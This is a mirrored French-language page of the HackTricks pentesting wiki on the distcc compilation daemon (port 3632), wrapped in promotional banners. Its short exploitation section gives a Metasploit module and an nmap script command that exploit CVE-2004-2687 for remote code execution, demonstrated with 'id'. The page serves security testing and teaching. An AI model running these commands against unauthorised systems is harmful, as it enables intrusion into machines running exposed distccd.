Mirrors/hacktricks

Fork 0

mirror of https://github.com/carlospolop/hacktricks synced 2024-11-22 20:53:37 +00:00

Translator 09d2dcb0ca Translated ['network-services-pentesting/3632-pentesting-distcc.md'] to

2024-03-11 14:45:12 +00:00

3.5 KiB

Raw Blame History

Apprenez le piratage AWS de zéro à héros avec htARTE (Expert en équipe rouge AWS de HackTricks)!

Autres façons de soutenir HackTricks:

Si vous souhaitez voir votre entreprise annoncée dans HackTricks ou télécharger HackTricks en PDF, consultez les PLANS D'ABONNEMENT!
Obtenez le swag officiel PEASS & HackTricks
Découvrez La famille PEASS, notre collection exclusive de NFTs
Rejoignez le 💬 groupe Discord ou le groupe Telegram ou suivez-nous sur Twitter 🐦 @carlospolopm.
Partagez vos astuces de piratage en soumettant des PR aux HackTricks et HackTricks Cloud github repos.

Informations de base

Distcc est un outil qui améliore le processus de compilation en utilisant la puissance de traitement inutilisée d'autres ordinateurs du réseau. Lorsque distcc est configuré sur une machine, cette machine est capable de distribuer ses tâches de compilation à un autre système. Ce système destinataire doit exécuter le démon distccd et doit avoir un compilateur compatible installé pour traiter le code envoyé.

Port par défaut : 3632

PORT     STATE SERVICE
3632/tcp open  distccd

Exploitation

Vérifiez si le système est vulnérable à CVE-2004-2687 pour exécuter du code arbitraire :

msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 <ip> --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'"

Shodan

Je ne pense pas que Shodan détecte ce service.

Ressources

Post créé par Álex B (@r1p)

Apprenez le piratage AWS de zéro à héros avec htARTE (HackTricks AWS Red Team Expert)!